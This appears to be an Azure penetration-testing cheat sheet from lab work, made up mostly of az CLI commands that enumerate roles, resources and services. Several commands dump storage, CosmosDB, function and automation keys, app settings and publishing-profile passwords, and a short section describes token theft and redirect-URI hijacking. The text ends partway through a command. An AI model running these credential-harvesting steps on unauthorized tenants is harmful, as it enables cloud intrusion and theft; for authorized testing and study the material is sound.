# Azure ## 1. Authentication & Setup [Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-azuread.html#enumeration) ### User ```bash export EMAIL='' export PASSWORD='' az login -u "$EMAIL" -p "$PASSWORD" [--allow-no-subscriptions] export SUBSCRIPTION_ID=$(az account show --query id --output tsv) export TENANT_ID=$(az account show --query tenantId --output tsv) export MY_OID=$(az ad signed-in-user show --query id -o tsv) ``` ### ARM (Service Principal Authentication) ```bash export ARM_CLIENT_ID='' export ARM_SECRET='' export TENANT_ID='fdd066e1-ee37-49bc-b08f-d0e152119b04' az login --service-principal -u "$ARM_CLIENT_ID" -p "$ARM_SECRET" --tenant "$TENANT_ID" [--allow-no-subscriptions] export SUBSCRIPTION_ID=$(az account show --query id --output tsv) export TENANT_ID=$(az account show --query tenantId --output tsv) export MY_OID=$(az ad sp show --id $ARM_CLIENT_ID --query id -o tsv) ``` ### Connection Information Displays details of the currently authenticated user. ```bash az ad signed-in-user show ``` Lists all subscriptions accessible by the current user ```bash az account list --output table ``` ## 2. Account Enumeration ### Groups [Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-azuread.html#groups) Retrieves every group in the tenant. ```bash az ad group list -o table ``` Retrieve Azure AD groups and directory roles assigned to the current identity. ```bash az rest --method get --url "https://graph.microsoft.com/v1.0/me/memberOf" --query "value[].{Name:displayName, ID:id}" -o table ``` Get groups where the user is a member ```bash az ad user get-member-groups --id $TARGET_EMAIL ``` List dynamic Azure AD groups (membership rule-based) ```bash az ad group list \ --filter "groupTypes/any(c:c eq 'DynamicMembership')" \ --query "[].{displayName:displayName, rule:membershipRule}" \ -o table ``` ### Roles [Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-azuread.html#azure-roles) Get **Entra ID** roles assigned and its definition (One Liner) ```bash for TARGET_ROLE_ID in $(az rest --method get --url "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments?\$filter=principalId eq '$MY_OID'" --query "value[].roleDefinitionId" -o tsv | sort -u); do echo -e "\n\n[+] Checking Entra ID Directory Role ID: $TARGET_ROLE_ID" az rest --method GET -o json \ --query "{RoleName:displayName, Description:description, Actions:rolePermissions[].allowedResourceActions[]}" \ --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions/$TARGET_ROLE_ID" done ``` Get Entra ID roles assigned and its definition (Manual) ```bash az rest --method get --query "value[].{RoleID:roleDefinitionId, Scope:directoryScopeId}" -o table --url "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments?\$filter=principalId eq '$MY_OID'" # Get Role Definition Details az rest --method GET -o json \ --query "{RoleName:displayName,Description:description, RoleID:id, Actions:rolePermissions[].allowedResourceActions[]}" \ --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions/$TARGET_ROLE_ID" ``` List **Azure Roles** & Show Role actions definitions for a given scope (One Liner) ```bash az role assignment list --assignee "$MY_OID" --include-inherited --include-groups --all --query "[].{id:roleDefinitionId, scp:scope}" -o tsv | while read -r role_id scope; do echo -e "\n\033[1;34m==== Inspecting Role: ${role_id##*/} ====\033[0m" echo -e "\033[1;33m[+] Scope:\033[0m $scope" # Fetch definition using the ID we just pulled az role definition show --id "$role_id" --query "{Name:roleName, Description:description, Actions:permissions[0].actions, DataActions:permissions[0].dataActions}" -o json done ``` List Azure Roles & Show Role actions definitions for a given scope (Manual) ```bash az role assignment list --include-inherited --include-groups --all \ --query "[].{RoleName:roleDefinitionName, RoleID:roleDefinitionId, Scope:scope, Type:principalType}" \ -o json --assignee "$MY_OID" # Get Role Definition Details az role definition show \ --query "{RoleName:roleName, Description:description, RoleID:id, Actions:permissions[0].actions, NotActions:permissions[0].notActions}" \ -o json --id $TARGET_ROLE_ID ``` Find Custom Azure Roles ```bash az role definition list --custom-role-only true --query "[].{roleName:roleName, name:name, actions:permissions[0].actions, dataActions:permissions[0].dataActions}" ``` ### Service Principals [Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-azuread.html#service-principals) ```bash az ad sp list --all -o table \ --query "[].{Name:displayName, ObjectId:id, AppId:appId, Type:servicePrincipalType, Enabled:accountEnabled, RedirectURIs:replyUrls}" ``` ### Users [Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-azuread.html#users) Enumerate EntraID Users ```bash az ad user list --output table --query "[].{ID:id,UserPrincipalName:userPrincipalName,DisplayName:displayName}" az rest --method GET -o json --url "https://graph.microsoft.com/v1.0/users" --query "value[].{ID:id, UPN:userPrincipalName, Name:displayName}" -o table ``` ## Resources Get Resource List ```bash az account set --subscription $SUBSCRIPTION_ID az resource list --query "[].{Name:name, Type:type, ResourceGroup:resourceGroup}" --output table # Through API REST az rest --method GET --url "https://management.azure.com/subscriptions/$SUBSCRIPTION_ID/resources?api-version=2021-04-01" \ --query "value[].{Name:name, Type:type}" \ -o table ``` Check what actions you can execute on every specific resource after all role inheritance and assignments are calculated. ```bash RESOURCES_JSON=$(az rest --method GET --output json [--headers "Authorization=Bearer $MANAGEMENT_TOKEN"]\ --url "https://management.azure.com/subscriptions/${SUBSCRIPTION_ID}/resources?api-version=2021-04-01") # 2. Process each resource using jq echo "$RESOURCES_JSON" | jq -c '.value[]' | while read -r resource; do # Extract variables from the JSON object RES_ID=$(echo "$resource" | jq -r '.id') RES_NAME=$(echo "$resource" | jq -r '.name') RES_TYPE=$(echo "$resource" | jq -r '.type') # Extract resource group from the resource ID string RES_RG=$(echo "$RES_ID" | sed -n 's/.*\/resourceGroups\/\([^\/]*\)\/.*/\1/p') # Visual separator echo "---" echo -e "\033[1;35m[#] Resource:\033[0m $RES_NAME" echo -e "\033[1;36m[+] Type:\033[0m $RES_TYPE" echo -e "\033[1;32m[+] Group:\033[0m $RES_RG" # 3. Fetch the permissions JSON using az rest and your manual token PERMS_JSON=$(az rest --method GET --output json [--headers "Authorization=Bearer $MANAGEMENT_TOKEN"]\ --url "https://management.azure.com${RES_ID}/providers/Microsoft.Authorization/permissions?api-version=2022-04-01") # 4. Show standard Actions echo -e "\033[1;33m[!] Actions:\033[0m" echo "$PERMS_JSON" | jq -r '.value[].actions[]' 2>/dev/null | sort -u | sed 's/^/ - /' # 5. Show Data Actions echo -e "\033[1;33m[!] Data Actions:\033[0m" echo "$PERMS_JSON" | jq -r '.value[].dataActions[]' 2>/dev/null | sort -u | sed 's/^/ - /' done ``` ### Identities [Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-azuread.html#managed-identities) List managed identities in the resource group ```bash az identity list -o table --resource-group $RESOURCE_GROUP ``` ### Storage accounts [Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-storage.html#enumeration) Enumerate storage accounts ```bash az storage account list \ --query "[].{Name:name, PublicAccess:allowBlobPublicAccess, HttpsOnly:enableHttpsTrafficOnly, MinTLS:minimumTlsVersion,IsHnsEnabled:isHnsEnabled, FTPEnabled:isSftpEnabled, LocalUserEnabled:isLocalUserEnabled, Firewall:networkRuleSet.defaultAction, BlobEndpoint:primaryEndpoints.blob, Location:location}" \ -o table --resource-group $RESOURCE_GROUP STORAGE_ACCOUNT_NAME=$(az storage account list --query "[0].name" -o tsv --resource-group $RESOURCE_GROUP) ``` In case case `Firewall` is set to "Deny", execute the following command to check the allowed roules. ```bash az storage account show \ --name $STORAGE_ACCOUNT_NAME \ --resource-group $RESOURCE_GROUP \ --query networkRuleSet \ --output json ``` Enumerate keys ```bash az storage account keys list \ --resource-group $RESOURCE_GROUP \ --account-name $STORAGE_ACCOUNT_NAME ACCESS_KEY=$(az storage account keys list -g $RESOURCE_GROUP -n $STORAGE_ACCOUNT_NAME --query "[0].value" -o tsv) ``` #### Containers [Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-storage.html#enumeration) Enumerate storage containers for a given account ```bash az storage container list --include-deleted \ --query "[].{Name:name, PublicAccess:properties.publicAccess, Metadata:metadata, LastModified:properties.lastModified,Deleted:deleted,Verion:version}" \ -o table --account-name $STORAGE_ACCOUNT_NAME \ [--auth-mode login | --account-key $ACCESS_KEY] ``` Enumerate files inside the container ```bash az storage blob list \ --include v \ --query "[].{Name:name,VersionId:versionId, IsCurrent:isCurrentVersion, Size:properties.contentLength, Type:properties.contentType, LastModified:properties.lastModified, MD5:properties.contentSettings.contentMd5}" \ --output table \ --account-name $STORAGE_ACCOUNT_NAME --container-name \ [--auth-mode login] ``` Download the file ```bash az storage blob download \ --account-name $STORAGE_ACCOUNT_NAME \ --container-name \ --name \ --file \ [--auth-mode login \] [--version-id "2026-05-07T06:54:11.8141618Z" \] ``` Script to check all the storage accounts, its containers and the files inside them ```bash export RESOURCE_GROUP= export STORAGE_ACCOUNT_NAME= # 1. Get all storage accounts in the resource group az storage account list --resource-group $RESOURCE_GROUP --query "[].name" -o tsv | while read -r ACCOUNT_NAME; do echo -e "\n\033[1;32m============================================================\033[0m" echo -e "\033[1;32m[!] TARGET STORAGE ACCOUNT: $STORAGE_ACCOUNT_NAME\033[0m" # 2. Retrieve Important Security Information (Account Level) az storage account show --name "$STORAGE_ACCOUNT_NAME" --resource-group iam-azure-labs \ --query "{Name:name, PublicAccess:allowBlobPublicAccess, FW_Default:networkRuleSet.defaultAction, BlobUrl:primaryEndpoints.blob}" -o table # 3. Enumerate Containers echo -e "\033[1;33m[+] Enumerating Containers for $STORAGE_ACCOUNT_NAME...\033[0m" CONTAINERS=$(az storage container list --account-name "$STORAGE_ACCOUNT_NAME" --auth-mode login --query "[].name" -o tsv 2>/dev/null) if [ -z "$CONTAINERS" ]; then echo -e "\033[0;31m [-] Access Denied or No Containers Found.\033[0m" else for CONTAINER in $CONTAINERS; do echo -e "\n \033[1;40m[#] CONTAINER: $CONTAINER\033[0m" # 4. Data Discovery: Retrieve Blobs (Files) within the container echo -e " \033[1;36m[>] Files Found (Data Discovery):\033[0m" az storage blob list --account-name "$STORAGE_ACCOUNT_NAME" --container-name "$CONTAINER" \ --auth-mode login --query "[].{FileName:name, Size:properties.contentLength, Type:properties.blobType, Modified:properties.lastModified}" -o table done fi done ``` #### File Shares [Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-file-shares.html#enumeration) Enumerate Shares ```bash az storage share list -o table \ --include-snapshots --include-metadata \ --query "[].{Name:name, Snapshot:snapshot, Modified:properties.lastModified, Metadata:metadata}" \ --account-name $STORAGE_ACCOUNT_NAME \ [--account-key $ACCESS_KEY] az storage share-rm list --include-deleted -o table \ --resource-group $RESOURCE_GROUP \ --query "[].{Name:name, IsDeleted:deleted, Version:version, DateDeleted:deletedTime, DaysLeft:remainingRetentionDays}" \ --account-name $STORAGE_ACCOUNT_NAME \ [--account-key $ACCESS_KEY] ``` Enumerate Files inside the Dir ```bash az storage file list -o table \ --account-name $STORAGE_ACCOUNT_NAME \ --share-name $SHARE_NAME \ [--account-key $ACCESS_KEY] ``` Download the file ```bash az storage file download \ --account-name $STORAGE_ACCOUNT_NAME \ --share-name \ --path \ --dest ./flag.txt \ [--account-key $ACCESS_KEY] ``` Enumerate snapshots ```bash az storage share snapshot \ --name $SHARE_NAME \ --account-name $STORAGE_ACCOUNT_NAME ``` For each snapshot in the share name, enumerate its files ```bash #ACCOUNT_NAME=$1 SHARE_NAME=file-share-lab-4 SNAPSHOTS=$(az storage share list \ --account-name "$STORAGE_ACCOUNT_NAME" \ --include-snapshots \ --query "[?name=='$SHARE_NAME' && snapshot != null].snapshot" \ -o tsv) if [ -z "$SNAPSHOTS" ]; then echo "No snapshots found for this share." fi ## 2. Iterate through each snapshot and list the files for SNAP in $SNAPSHOTS; do echo "----------------------------------------------------" echo "SNAPSHOT VERSION: $SNAP" echo "----------------------------------------------------" az storage file list \ --account-name "$STORAGE_ACCOUNT_NAME" \ --share-name "$SHARE_NAME" \ --snapshot "$SNAP" \ --output table echo -e "\n" done ``` ### Applications [Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-azuread.html#applications) Enumerate applcations and miss configurations ```bash az rest --method get --url "https://graph.microsoft.com/v1.0/applications" --query "value[].{Name:displayName, AppID:appId, ObjID:id, Public:isFallbackPublicClient, ImpAccess:web.implicitGrantSettings.enableAccessTokenIssuance, ImpID:web.implicitGrantSettings.enableIdTokenIssuance, Redirects:web.redirectUris[0]}" -o table ``` 1. Implicit Grant (`ImpAccess` / `ImpID`) * **The Risk:** If `enableAccessTokenIssuance` or `enableIdTokenIssuance` is `true`, the application is using the **Implicit Flow**. * **Attack:** This flow is legacy and insecure. Tokens are returned directly in the URL fragment (after the `#`), making them susceptible to theft via browser history, logs, or Referer headers. 2. Public Client (`Public`) * **The Risk:** If this is `true` (or `isFallbackPublicClient` is enabled), the application is considered a "Public Client" (like a mobile app or a script). * **Attack:** These apps **do not require a Client Secret** to authenticate. If you find a valid username/password (via spraying), you can often authenticate directly against this App ID without needing a secret. 3. Redirect URIs (`Redirects`) * **The Risk:** These are the URLs where Azure sends the auth token after login. * **Attack:** * **Open Redirects:** If a URI is overly broad (e.g., `[https://example.com/](https://example.com/)*`), you might be able to craft a link that sends the token to a server you control. * **Subdomain Takeover:** If one of the listed URLs points to a dead subdomain, you can claim that subdomain and hijack any tokens sent to it. 4. Required Resource Access (Permissions) If you want to see what this application is actually allowed to **do** (e.g., "Read all Mail," "Directory.ReadWrite.All"), add this to the query: * `Perms:requiredResourceAccess[].resourceAccess[].id` See the application's permissions and internal identifier URIs (great for finding internal domain names ```bash az rest --method get --url "https://graph.microsoft.com/v1.0/applications" \ --query "value[].{Name:displayName, AppID:appId, Identifiers:join(', ', identifierUris), Permissions:requiredResourceAccess[].resourceAccess}" \ -o json ``` Identify the target app ```bash APP_ID=$(az ad app list --query "[?contains(displayName, 'azure-applications-lab-1-phishing-app')].appId | [0]" -o tsv); echo "$APP_ID" ``` Identify users or service principals that have administrative rights over this application. ```bash az ad app owner list \ --query "[].{Name:displayName, Type:principalType, UPN:userPrincipalName, ID:id}" \ -o table --id "$APP_ID" ``` ### KeyVault [More commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-keyvault.html#enumeration) ```bash az keyvault list --resource-group $RESOURCE_GROUP --query "[].{Name:name, URI:properties.vaultUri, Public:properties.publicNetworkAccess, RBAC_Off:properties.enableRbacAuthorization, PolicyCount:length(properties.accessPolicies || '[]')}" --output table ``` Who has access to the key vault ```bash az keyvault show --name $KEYVAULT_NAME --query "properties.accessPolicies[].{OID:objectId, Permissions:permissions.secrets}" --output table ``` Enumerate KeyVault keys ```bash az keyvault key list --vault-name $KEYVAULT_NAME ``` Enumerate KeyVault secrets ```bash az keyvault secret list --query "[].{name:name}" -o tsv --vault-name $KEYVAULT_NAME ``` ### VMs [Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/vms/index.html#vm-enumeration) ```bash # If Error "does not have authorization to perform action 'Microsoft.Network/networkInterfaces/read" remove "--show-details" az vm list --show-details --query "[].{Name:name, RG: resourceGroup, OS:storageProfile.osDisk.osType, PublicIP:publicIps, PrivateIP:privateIps, Status:powerState, Identity:identity.type, Size:hardwareProfile.vmSize}" --output table ``` Obtain Machine user identities ```bash az vm show \ --name "$VM_NAME" \ --resource-group "$RESOURCE_GROUP" \ --query "{SystemIdentityOID:identity.principalId, UserIdentities:identity.userAssignedIdentities}" \ --output json ``` ### Disks [Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/vms/index.html#disks--snapshots) ```bash az disk list --query "[].{ Name: name, RG: resourceGroup, SizeGB: diskSizeGb, State: managedBy == \`null\` && 'UNATTACHED' || 'Attached', VM: managedBy, Encryption: encryption.type, NetworkPolicy: networkAccessPolicy, PublicAccess: publicNetworkAccess, CreatedFrom: creationData.sourceResourceId }" --output table --resource-group "$RESOURCE_GROUP" ``` ### Table Storage [Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-table-storage.html#enumeration) ### MSSQL [Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-sql.html#enumeration) Enumerate servers ```bash az sql server list --expand-ad-admin --query "[].{Name:name, FQDN:fullyQualifiedDomainName, PublicAccess:publicNetworkAccess,restrictOutboundNetworkAccess:restrictOutboundNetworkAccess, ResourceGroup:resourceGroup, Admin:administratorLogin, EntraAdmin:externalAdministrator.login, AdminType:externalAdministrator.principalType, AdminSID:externalAdministrator.sid}" --output table ``` Identify information from a given server ```bash # List Server Usages az sql server list-usages --name $SQL_SERVER --resource-group $RESOURCE_GROUP # List Server Firewalls az sql server firewall-rule list --output table \ --query "[].{Rule:name, Start:startIpAddress, End:endIpAddress}" \ --resource-group $RESOURCE_GROUP --server $SQL_SERVER # List of Azure Active Directory administrators in a server. az sql server ad-admin list --resource-group $RESOURCE_GROUP --server $SQL_SERVER --query "[].{Admin:login, Type:principalType, Tenant:tenantId, SID:sid}" --output table # Gets an advanced threat protection az sql server advanced-threat-protection-setting show --resource-group $RESOURCE_GROUP --name $SQL_SERVER --output json # DNS Aliases az sql server dns-alias list --resource-group $RESOURCE_GROUP --server $SQL_SERVER --query "[].{Alias:name}" --output table # Server Keys az sql server key list --resource-group $RESOURCE_GROUP --server $SQL_SERVER --query "[].{KeyName:name, URI:uri, Type:serverKeyType}" --output table #Server Encryption Protecto az sql server tde-key show --resource-group $RESOURCE_GROUP --server $SQL_SERVER --query "{KeyName:serverKeyName, Type:serverKeyType}" --output json ``` Obtian information from the database perspective ```bash # List databases az sql db list --query "[].{Name:name, Status:status, Tier:sku.tier, Ledger:ledgerOn, InfraEncrypt:isInfraEncryptionEnabled, Backup:currentBackupStorageRedundancy}" --output table --server $SQL_SERVER --resource-group $RESOURCE_GROUP # List deleted SQL databases az sql db list-deleted --server $SQL_SERVER --resource-group $RESOURCE_GROUP # DB Metada Info az sql db show --name $DB_NAME --server $SQL_SERVER --resource-group $RESOURCE_GROUP --query "{Name:name, TDE:transparentDataEncryption.status, Ledger:ledgerConfiguration.ledgerState, Identity:identity.type, ZoneRedundant:zoneRedundant, CreateDate:creationDate,isInfraEncryptionEnabled:isInfraEncryptionEnabled}" --output json # DB Usage az sql db list-usages --name $DB_NAME --server $SQL_SERVER --resource-group $RESOURCE_GROUP \ --query "[].{Metric:displayName, CurrentValue:currentValue, Limit:limit, Unit:unit}" \ --output table # Threat Policy az sql db threat-policy show --name $DB_NAME --server $SQL_SERVER --resource-group $RESOURCE_GROUP # Data Masking az rest --method GET --uri "https://management.azure.com/subscriptions/$SUBSCRIPTION_ID/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.Sql/servers/$SQL_SERVER/databases/$DB_NAME/dataMaskingPolicies/Default?api-version=2021-11-01" | jq . az rest --method get --uri "https://management.azure.com/subscriptions/$SUBSCRIPTION_ID/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.Sql/servers/$SQL_SERVER/databases/$DB_NAME/dataMaskingPolicies/Default/rules?api-version=2021-11-01" | jq . # Row Policies sqlcmd -S $SQL_SERVER.database.windows.net -d $DB_NAME -U "$DB_USER" -P "$DB_PASSWORD" \ -W -s "," -Q "SELECT sp.name, sp.is_enabled, OBJECT_NAME(sp.object_id) AS TableName, sp2.predicate_definition FROM sys.security_policies AS sp JOIN sys.security_predicates AS sp2 ON sp.object_id = sp2.object_id;" \ | column -s, -t ``` ### MySQL [Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-mysql.html#enumeration) Enumerate Database Servers ```bash az mysql flexible-server list --output table --resource-group $RESOURCE_GROUP --query "[].{Server:name, FQDN:fullyQualifiedDomainName, Port:databasePort, Version:version, Admin:administratorLogin, PublicAccess:network.publicNetworkAccess, EntraAuth:authConfig.activeDirectoryAuth, HA:highAvailability.mode, Tier:sku.tier}" ``` Enumerate Databases ```bash az mysql flexible-server db list --output table\ --query '[].{Name:name,collation:collation,resourceGroup:resourceGroup,systemData:systemData}' \ --resource-group $RESOURCE_GROUP --server-name $SERVER_NAME ``` FIrewall Rules ```bash az mysql flexible-server firewall-rule list --query "[].{RuleName:name, Start:startIpAddress, End:endIpAddress}" --output table \ --resource-group $RESOURCE_GROUP --name $SERVER_NAME ``` List AD admins and users ```bash az mysql flexible-server ad-admin list --resource-group $RESOURCE_GROUP --server-name $SERVER_NAME az mysql flexible-server identity list --resource-group $RESOURCE_GROUP --server-name $SERVER_NAME ``` List backups and replicas ```bash az mysql flexible-server backup list --resource-group $RESOURCE_GROUP --name $SERVER_NAME az mysql flexible-server replica list --resource-group $RESOURCE_GROUP --name $SERVER_NAME ``` **Enumerate Monitoring Mechanisms** Get the server's advanced threat protection setting ```bash az mysql flexible-server advanced-threat-protection-setting show --resource-group $RESOURCE_GROUP --server-name $SERVER_NAME ``` Audit Logging Enabled ```bash az mysql flexible-server parameter show --name "audit_log_enabled" \ --query "{Parameter:name, Status:value}" \ --resource-group $RESOURCE_GROUP --server-name $SERVER_NAME ``` List all of the maintenances of a flexible server ```bash az mysql flexible-server maintenance list --resource-group $RESOURCE_GROUP --server-name $SERVER_NAME ``` List log files for a server ```bash az mysql flexible-server server-logs list --resource-group $RESOURCE_GROUP --server-name $SERVER_NAME ``` ### PostgreSQL [Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-postgresql.html#enumeration) Database Servers ```bash az postgres flexible-server list --output table \ --query "[].{Server:name, FQDN:fullyQualifiedDomainName, Version:version, Admin:administratorLogin, PublicAccess:network.publicNetworkAccess, EntraAuth:authConfig.activeDirectoryAuth, PwdAuth:authConfig.passwordAuth, Tier:sku.tier}" \ --resource-group $RESOURCE_GROUP ``` Databases ```bash az postgres flexible-server db list \ --resource-group $RESOURCE_GROUP \ --server-name $SERVER_NAME \ --query "[].{Name:name, ResourceGroup:resourceGroup, SystemData:systemData}" \ --output table ``` Enumerate Firewalls ```bash az postgres flexible-server firewall-rule list \ --query "[].{Rule:name, Start:startIpAddress, End:endIpAddress}" \ --output table \ --resource-group $RESOURCE_GROUP --name $SERVER_NAME ``` ### CosmosDB [Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-cosmosDB.html#enumeration) Enumerate Instances ```bash az cosmosdb list -o table \ --query "[].{Name:name, Kind:kind, Endpoint:documentEndpoint, PublicAccess:publicNetworkAccess, NetworkBypass:networkAclBypass, Location:location,NoVnet:isVirtualNetworkFilterEnabled, LocalAuth:disableLocalAuth}" \ --resource-group $RESOURCE_GROUP ``` Obtain keys ```bash az cosmosdb keys list --resource-group $RESOURCE_GROUP --name $SERVER_NAME ``` ### MongoDB [Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-cosmosDB.html#enumeration-1) ```bash az cosmosdb list --resource-group $RESOURCE_GROUP \ --query "[].{Name:name, Kind:kind, PublicAccess:publicNetworkAccess, LocalAuth:disableLocalAuth, IpRules:ipRules, Endpoint:documentEndpoint}" \ -o table ``` ### App Services [Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-app-services.html#enumeration) ```bash az webapp list --query "[].{Name:name,resourcegroup:resourceGroup, Host:defaultHostName, SCM:enabledHostNames[1], HTTPS_Only:httpsOnly, Runtime:siteConfig.linuxFxVersion || siteConfig.windowsFxVersion,State:state, Public_Access:publicNetworkAccess, Identity:identity.type, ClientCert:clientCertMode,CORS:cors,RemoteDebug:remoteDebuggingEnabled, WebSockets:webSocketsEnabled}" --output json ``` Get the App Settings (API Keys, DB Strings, etc.) ```bash az webapp config appsettings list --resource-group $RESOURCE_GROUP --name $WEBAPP_NAME ``` Retrieves the publishing profiles ```bash az webapp deployment list-publishing-profiles \ --name $WEBAPP_NAME \ --resource-group $RESOURCE_GROUP \ --query "[].{Profile:profileName, Method:publishMethod, URL:publishUrl, User:userName, Password:userPWD,SQLServerDBConnectionString:SQLServerDBConnectionString,destinationAppUrl:destinationAppUrl}" \ -o json ``` ### Azure Container Registry [Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-container-registry.html#enumeration) ```bash az acr list --query "[].{Name:name, Server:loginServer, SKU:sku.name, PublicAccess:publicNetworkAccess, AdminUser:adminUserEnabled, AnonPull:anonymousPullEnabled, Region:location}" -o table ``` ### Function Apps [Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-function-apps.html#enumeration) ```bash az functionapp list --query "[].{Name:name,defaultHostName:defaultHostName,hostNames:hostNames,hostNamesDisabled:hostNamesDisabled, RG:resourceGroup, Runtime:functionAppConfig.runtime.name, Identity:identity.type, PrincipalID:identity.principalId, StorageURL:functionAppConfig.deployment.storage.value, HTTPS:httpsOnly}" -o json ``` List functions ```bash az functionapp function list -o table \ --query "[].{Name:name, Trigger:config.bindings[0].type, Queue:config.bindings[0].queueName, Script:config.scriptFile,functionDirectory:config.functionDirectory,Language:language,href:href}" \ --name $FUNCTION_NAME --resource-group $RESOURCE_GROUP ``` Get details about the source of the function code ```bash az functionapp deployment source show \ --name $FUNCTION_NAME --resource-group $RESOURCE_GROUP ``` Retrieve the publishing profiles for a specific Azure Function App ```bash az functionapp deployment list-publishing-profiles --name $FUNCTION_NAME --resource-group $RESOURCE_GROUP ``` Get SCM credentials ``` az functionapp deployment list-publishing-credentials --name $FUNCTION_NAME --resource-group $RESOURCE_GROUP ``` Get function, system and master keys ```bash az functionapp keys list --name $FUNCTION_NAME --resource-group $RESOURCE_GROUP ``` ### Static Web Apps [Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-static-web-apps.html#enumeration) ```bash az staticwebapp list --query "[].{Name:name, ResourceGroup:resourceGroup, Hostname:defaultHostname, PublicAccess:publicNetworkAccess, SKU:sku.name, Identity:identity, KeyVaultId:keyVaultReferenceIdentity, ConfigUpdates:allowConfigFileUpdates, StagingPolicy:stagingEnvironmentPolicy, Backends:linkedBackends}" --output table ``` Get appsettings ```bash az staticwebapp appsettings list --name $WEBAPP_NAME ``` Get env information ```bash az staticwebapp environment list --name $WEBAPP_NAME az staticwebapp environment functions --name $WEBAPP_NAME az staticwebapp secrets list --name $WEBAPP_NAME ``` Get current snippets ```bash az rest --method GET \ --url "https://management.azure.com/subscriptions/$SUBSCRIPTION_ID/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.Web/staticSites/$WEBAPP_NAME/snippets?api-version=2022-03-01" ``` Get database connections ```bash az rest --method GET \ --url "https://management.azure.com/subscriptions/$SUBSCRIPTION_ID/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.Web/staticSites/$WEBAPP_NAME/databaseConnections?api-version=2021-03-01" ``` ### Azure Container Registry (ACR) [Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-container-registry.html#enumeration) ```bash az acr list --query "[].{Name:name,loginServer:loginServer, AdminUser:adminUserEnabled, PublicAccess:publicNetworkAccess, AnonPull:anonymousPullEnabled, SKU:sku.tier, TrustPolicy:policies.trustPolicy.status, Encryption:encryption.status, resourceGroup:resourceGroup}" --output table ``` List of all authentication tokens ```bash az acr token list --registry $ACR_NAME --resource-group $RESOURCE_GROUP ``` Retrieve recently deleted repositories ```bash az acr repository list-deleted --name $ACR_NAME ``` Retrieve active repositories ```bash az acr repository list --name $ACR_NAME --resource-group $RESOURCE_GROUP ``` List tasks runs ```bash az acr task list --output table \ --query "[].{Name:name, Identity:identity.type, Source:step.contextPath, Schedule:trigger.timerTriggers[0].schedule, Status:status, imageName:step.imageNames}" \ --registry $ACR_NAME ``` ### Azure Container Instances [Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.html#enumeration) ```bash az container list --query "[].{Name:name, ResourceGroup:resourceGroup, FQDN:ipAddress.fqdn, PublicIP:ipAddress.ip, Port:ipAddress.ports[0].port, Identity:identity.type, Image:containers[0].image, OS:osType, Registry:imageRegistryCredentials[0].server}" --output json ``` ### Queue Storage [Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-queue.html#enumeration) ```bash az storage account list --query "[].{Name:name, ResourceGroup:resourceGroup, PublicBlob:allowBlobPublicAccess, SharedKey:allowSharedKeyAccess, NetDefaultAction:networkRuleSet.defaultAction, PublicNetwork:publicNetworkAccess, MinTLS:minimumTlsVersion, OAuthOnly:defaultToOAuthAuthentication}" -o table ``` ```bash az storage queue list --account-name $STORAGE_ACCOUNT_NAME [--auth-mode login] ``` ### Automation Accounts [Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-automation-accounts.html#enumeration) ```bash az automation account list --output json --query "[].{name:name,description:description,publicNetworkAccess:publicNetworkAccess,privateEndpointConnections:privateEndpointConnections,disableLocalAuth:disableLocalAuth,identity:identity}" ``` Get keys of automation account. These are used for the DSC ```bash az automation account list-keys --automation-account-name $AUTOMATION_NAME --resource-group $RESOURCE_GROUP ``` Get schedules of automation account ``` az automation schedule list --automation-account-name $AUTOMATION_NAME --resource-group $RESOURCE_GROUP ``` Get jobs of an automation account ```bash az automation job list --automation-account-name $AUTOMATION_NAME --resource-group $RESOURCE_GROUP ``` Get runbooks of an automation account ```bash az automation runbook list --automation-account-name $AUTOMATION_NAME --resource-group $RESOURCE_GROUP ``` Get runbook content ```bash az rest --method GET \ --url 